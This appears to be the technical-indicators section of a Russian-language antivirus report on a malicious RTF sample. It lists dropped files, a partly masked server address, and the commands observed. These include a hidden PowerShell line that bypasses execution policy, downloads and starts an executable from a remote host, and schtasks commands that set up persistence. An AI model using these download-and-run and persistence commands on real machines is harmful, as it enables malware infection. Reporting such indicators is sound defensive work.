Техническая информация
- <SYSTEM32>\tasks\updates\etnnyjcvqw
- http://64.##.139.179/3jpuknjqcqlrd5c.exe как %appdata%\v7cwvzeo7xra.exe
- v7cwvzeo7xra.exe
- %TEMP%\abdtfhghgdghgh›.sct
- %APPDATA%\v7cwvzeo7xra.exe
- <Текущая директория>\~wrd0000.tmp
- %APPDATA%\etnnyjcvqw.exe
- %TEMP%\tmpb615.tmp
- %TEMP%\abdtfhghgdghgh›.sct
- %TEMP%\tmpb615.tmp
- <PATH_SAMPLE>.rtf
- '64.##.139.179':80
- '%APPDATA%\v7cwvzeo7xra.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://64.##.139.179/3jpUKNJqCQlRD5c.exe','%APPDATA%\v7CWvZEo7xra.exe');Start...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\eTnNyjCVqw" /XML "%TEMP%\tmpB615.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\eTnNyjCVqw" /XML "%TEMP%\tmpB615.tmp"